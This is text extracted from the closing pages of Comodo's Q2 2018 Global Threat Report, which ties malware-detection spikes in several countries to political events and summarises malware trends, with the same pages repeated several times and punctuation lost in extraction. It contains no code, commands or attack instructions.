Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
